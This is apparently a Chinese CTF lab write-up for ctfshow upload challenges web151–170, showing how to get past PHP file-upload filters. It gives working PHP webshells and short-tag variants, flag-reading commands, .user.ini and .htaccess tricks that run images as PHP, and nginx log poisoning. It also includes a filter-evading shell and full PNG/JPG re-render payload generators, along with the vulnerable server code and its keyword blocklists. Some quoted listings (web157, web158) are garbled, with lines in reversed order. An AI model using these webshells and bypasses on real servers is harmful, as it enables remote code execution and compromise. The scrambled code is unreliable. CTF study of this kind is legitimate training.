文件上传

web151

js验证

抓包直接绕过

这只能上传png

web152

content-type验证

<?php @eval($_POST["zf"]);?>

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-24 21:20:33
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/png'){
    		move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
    		$ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}

echo json_encode($ret);

web153

.user.ini绕过

自 PHP 5.3.0 起，PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI／FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里，则用 .htaccess 文件有同样效果。
除了主 php.ini 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（$_SERVER['DOCUMENT_ROOT'] 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。
在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。

具体的配置可以看该链接,也就是里面除了PHP_INI_SYSTEM模式的配置之外都可以在.user.ini进行重写.那么我们就去找我们需要用到的配置,发现auto_append_file和auto_prepend_file,一个相当于在每个php文件尾加上include(“xxx”),一个相当于在文件头加上include(“xxx”)其中xxx就是auto_append_file的值

为了利用auto_append_file,我们首先上传一个带木马的图片,接着上传.user.ini内容为auto_append_file=”xxx”xxx为我们上传的图片文件名.这样就在每一个php文件上包含了我们的木马文件.

但是这种方式是有前提的,是必须要在.user.ini目录下面有一个.PHP的文件才能进行包含

GIF89a
auto_prepend_file=zf.png

可见这里是存在的

接着上传一个zf.png文件

连接upload/index.php

upload.php

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-24 21:46:57
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if($ext_suffix!='php'){
                move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
            }else{
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }
    		
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}

echo json_encode($ret);

web154

短标签绕过

<?@eval($_POST['zf']);?>	开启配置参数short_open_tags=on

<?=@eval($_POST['zf']);?>	等价于<?php echo (表达式)?>	不需要开启参数设置

<%@eval($_POST['zf']);%>	开启配置参数asp_tags=on,7.0以下可以使用

<script language="php">@eval($_POST['zf']);</script>	不需要修改参数开关，但是只能在7.0以下可

只有这个可行

upload.php

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-26 15:30:10
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if($ext_suffix!='php'){
                $content = file_get_contents($_FILES["file"]["tmp_name"]);
                if(strrpos($content, "php")==FALSE){
                    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                    $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
                }else{
                    $ret = array("code"=>3,"msg"=>"文件内容不合规");
                }
                
            }else{
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }
    		
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}

echo json_encode($ret);

web155

<?@eval($_POST['zf']);?>	开启配置参数short_open_tags=on

<?=@eval($_POST['zf']);?>	等价于<?php echo (表达式)?>	不需要开启参数设置

upload.php

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-26 15:49:51
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if($ext_suffix!='php'){
                $content = file_get_contents($_FILES["file"]["tmp_name"]);
                if(stripos($content, "php")===FALSE){
                    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                    $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
                }else{
                    $ret = array("code"=>2,"msg"=>"文件类型不合规");
                }
                
            }else{
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }
    		
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}

echo json_encode($ret);

web156

过滤[]

<?@eval($_POST{'zf'});?>	开启配置参数short_open_tags=on

<?=@eval($_POST{'zf'});?>	等价于<?php echo (表达式)?>	不需要开启参数设置

upload.php

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-26 15:49:51
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if($ext_suffix!='php'){
                $content = file_get_contents($_FILES["file"]["tmp_name"]);
                if(stripos($content, "php")===FALSE && stripos($content,"[")===FALSE){
                    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                    $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
                }else{
                    $ret = array("code"=>2,"msg"=>"文件类型不合规");
                }
                
            }else{
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }
    		
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}

echo json_encode($ret);

web157

过滤;

<?(system("tac ../fl*"))?>	
<?=system('tac ../f*')?>	

echo json_encode($ret);
}
    return !preg_match('/php|\{|\[|\;/i', $str);
function check($str){
}

    }
    	
    	}
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}else{
    		
            }
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }else{
                
                }
                    $ret = array("code"=>2,"msg"=>"文件类型不合规");
                }else{
                    $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
                    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                if(stripos($content, "php")===FALSE && check($content)){
                $content = file_get_contents($_FILES["file"]["tmp_name"]);
            if($ext_suffix!='php'){
            $ext_suffix = $arr['extension'];
            $arr = pathinfo($filename);
    	if($_FILES['file']['type'] == 'image/png'){
    }else{
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    if($filesize>1024){
    $filesize = ($_FILES["file"]["size"] / 1024);
    $filename = $_FILES["file"]["name"];
{
else
}
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
{
if ($_FILES["file"]["error"] > 0)

web158

<?(system("tac ../fl*"))?>	
<?=system('tac ../f*')?>	

upload.php

echo json_encode($ret);
}
    return !preg_match('/php|\{|\[|\;|log/i', $str);
function check($str){
}

    }
    	
    	}
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}else{
    		
            }
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }else{
                
                }
                    $ret = array("code"=>2,"msg"=>"文件类型不合规");
                }else{
                    $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
                    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                if(stripos($content, "php")===FALSE && check($content)){
                $content = file_get_contents($_FILES["file"]["tmp_name"]);
            if($ext_suffix!='php'){
            $ext_suffix = $arr['extension'];
            $arr = pathinfo($filename);
    	if($_FILES['file']['type'] == 'image/png'){
    }else{
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    if($filesize>1024){
    $filesize = ($_FILES["file"]["size"] / 1024);
    $filename = $_FILES["file"]["name"];
{
else
}
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
{
if ($_FILES["file"]["error"] > 0)
error_reporting(0);
*/

 link: https://ctfer.com
 email: h1xa@ctfer.com
 Last Modified time: 2020-10-26 15:49:51
 Last Modified by:   h1xa
 Date:   2020-10-24 19:34:52
 Author: h1xa
# -*- coding: utf-8 -*-
/*

<?php
<?phpnothing here

web159

过滤括号;

<?=`tac ../fl*`?>

web160

日志包含

在ua上写入

<?=`tac ../fl*`?>

图片内容如下

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

web161

检查文件头前面加上

GIF89a

web162

条件竞争

web163

web164

png图片二次渲染绕过

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y+1];
    $b = $p[$y+2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./zf.png');  //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
 */

?>

运行完上传

查看一下

curl + s保存 打开查看

web165

jpg图片二次渲染绕过

PHP1.php

<?php
$miniPayload = '<?php @eval($_POST["zf"]);?>';


if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
    die('php-gd is not installed');
}

if(!isset($argv[1])) {
    die('php jpg_payload.php <jpg_name.jpg>');
}

set_error_handler("custom_error_handler");

for($pad = 0; $pad < 1024; $pad++) {
    $nullbytePayloadSize = $pad;
    $dis = new DataInputStream($argv[1]);
    $outStream = file_get_contents($argv[1]);
    $extraBytes = 0;
    $correctImage = TRUE;

    if($dis->readShort() != 0xFFD8) {
        die('Incorrect SOI marker');
    }

    while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
        $marker = $dis->readByte();
        $size = $dis->readShort() - 2;
        $dis->skip($size);
        if($marker === 0xDA) {
            $startPos = $dis->seek();
            $outStreamTmp =
                substr($outStream, 0, $startPos) .
                $miniPayload .
                str_repeat("\0",$nullbytePayloadSize) .
                substr($outStream, $startPos);
            checkImage('_'.$argv[1], $outStreamTmp, TRUE);
            if($extraBytes !== 0) {
                while((!$dis->eof())) {
                    if($dis->readByte() === 0xFF) {
                        if($dis->readByte !== 0x00) {
                            break;
                        }
                    }
                }
                $stopPos = $dis->seek() - 2;
                $imageStreamSize = $stopPos - $startPos;
                $outStream =
                    substr($outStream, 0, $startPos) .
                    $miniPayload .
                    substr(
                        str_repeat("\0",$nullbytePayloadSize).
                        substr($outStream, $startPos, $imageStreamSize),
                        0,
                        $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
                    substr($outStream, $stopPos);
            } elseif($correctImage) {
                $outStream = $outStreamTmp;
            } else {
                break;
            }
            if(checkImage('payload_'.$argv[1], $outStream)) {
                die('Success!');
            } else {
                break;
            }
        }
    }
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');

function checkImage($filename, $data, $unlink = FALSE) {
    global $correctImage;
    file_put_contents($filename, $data);
    $correctImage = TRUE;
    imagecreatefromjpeg($filename);
    if($unlink)
        unlink($filename);
    return $correctImage;
}

function custom_error_handler($errno, $errstr, $errfile, $errline) {
    global $extraBytes, $correctImage;
    $correctImage = FALSE;
    if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
        if(isset($m[1])) {
            $extraBytes = (int)$m[1];
        }
    }
}

class DataInputStream {
    private $binData;
    private $order;
    private $size;

    public function __construct($filename, $order = false, $fromString = false) {
        $this->binData = '';
        $this->order = $order;
        if(!$fromString) {
            if(!file_exists($filename) || !is_file($filename))
                die('File not exists ['.$filename.']');
            $this->binData = file_get_contents($filename);
        } else {
            $this->binData = $filename;
        }
        $this->size = strlen($this->binData);
    }

    public function seek() {
        return ($this->size - strlen($this->binData));
    }

    public function skip($skip) {
        $this->binData = substr($this->binData, $skip);
    }

    public function readByte() {
        if($this->eof()) {
            die('End Of File');
        }
        $byte = substr($this->binData, 0, 1);
        $this->binData = substr($this->binData, 1);
        return ord($byte);
    }

    public function readShort() {
        if(strlen($this->binData) < 2) {
            die('End Of File');
        }
        $short = substr($this->binData, 0, 2);
        $this->binData = substr($this->binData, 2);
        if($this->order) {
            $short = (ord($short[1]) << 8) + ord($short[0]);
        } else {
            $short = (ord($short[0]) << 8) + ord($short[1]);
        }
        return $short;
    }

    public function eof() {
        return !$this->binData||(strlen($this->binData) === 0);
    }
}
?>

zf.jpg

直接上传

将图片保存到本地

运行

产生

上传

连接

upload.php

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-27 17:14:10
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/jpeg'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if(in_array($ext_suffix, array("jpg"))){
                $jpg = imagecreatefromjpeg($_FILES["file"]["tmp_name"]);
                if($jpg==FALSE){
                    $ret = array("code"=>2,"msg"=>"文件类型不合规");
                }else{
                    $dst = 'upload/'.md5($_FILES["file"]["name"]).".jpg";
                    imagejpeg($jpg,$dst);
                    $ret = array("code"=>0,"msg"=>md5($_FILES["file"]["name"]).".jpg");
                }
            }else{
                $ret = array("code"=>3,"msg"=>"只允许上传jpg格式图片");
            }
            
    		
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}


echo json_encode($ret);

web166

上传zip文件

新建一个zip文件写入一句话

直接上传

下载的时候抓包

访问

upload.php

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-28 22:14:40
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'application/x-zip-compressed'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if(in_array($ext_suffix, array("zip"))){
                move_uploaded_file($_FILES["file"]["tmp_name"], './upload/'.md5($_FILES["file"]["tmp_name"]).'.zip');
                $ret = array("code"=>0,"msg"=>md5($_FILES["file"]["tmp_name"]).'.zip');
            }else{
                $ret = array("code"=>3,"msg"=>"只允许上传zip格式文件");
            }
            
    		
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}


echo json_encode($ret);

web167

.haccess绕过

apache解析漏洞

先上传.htaccess文件

AddType application/x-httpd-php .png   //将.png后缀的文件解析 成php

或者

<FilesMatch "png">
SetHandler application/x-httpd-php
</FilesMatch>

先改名为.jpg哦

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-28 22:14:40
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
#error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/jpeg'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if(!in_array($ext_suffix, array("php"))){
                move_uploaded_file($_FILES["file"]["tmp_name"], './upload/'.$_FILES["file"]["name"]);
                $ret = array("code"=>0,"msg"=>$_FILES["file"]["name"]);
            }else{
                $ret = array("code"=>3,"msg"=>"只允许上传jpg格式文件");
            }
            
    		
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}


echo json_encode($ret);

web168

免杀

<?php
$a=$_REQUEST['a'];
$b=$_REQUEST['b'];
$a($b);
?>

这个还行

直接传php哦

访问

web169

.user.ini日志包含

上传zip哦,在该content

auto_append_file="/var/log/nginx/access.log"

上传一个user.ini ua加一句话

接着上传一个1.php文件,内容随便

连接1.php文件

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-30 00:11:17
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/png'){
            $str = file_get_contents($_FILES["file"]["tmp_name"]);
            if(check($str)===0){
                move_uploaded_file($_FILES["file"]["tmp_name"], './upload/'.$_FILES["file"]["name"]);
                $ret = array("code"=>0,"msg"=>$_FILES["file"]["name"]);
            }
            
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}

function check($str){
    return preg_match('/eval|include|require|assert|assert|_POST|_GET|_COOKIE|system|shell_exec|php|\\$|\?|\<|\>/i', $str);
}

echo json_encode($ret);

web170

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2020-10-24 19:34:52
 Last Modified by:   h1xa
 Last Modified time: 2020-10-30 00:11:17
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/png'){
            $str = file_get_contents($_FILES["file"]["tmp_name"]);
            if(check($str)===0){
                move_uploaded_file($_FILES["file"]["tmp_name"], './upload/'.$_FILES["file"]["name"]);
                $ret = array("code"=>0,"msg"=>$_FILES["file"]["name"]);
            }
            
    	}else{
    		$ret = array("code"=>2,"msg"=>"文件类型不合规");
    	}
    	
    }

}

function check($str){
    return preg_match('/eval|assert|assert|_POST|_GET|_COOKIE|system|shell_exec|php|\\$|\?|\<|\>|\(|\)|\{|\[|\}|\]|\,|\%|\`|\~|\+/i', $str);
}

echo json_encode($ret);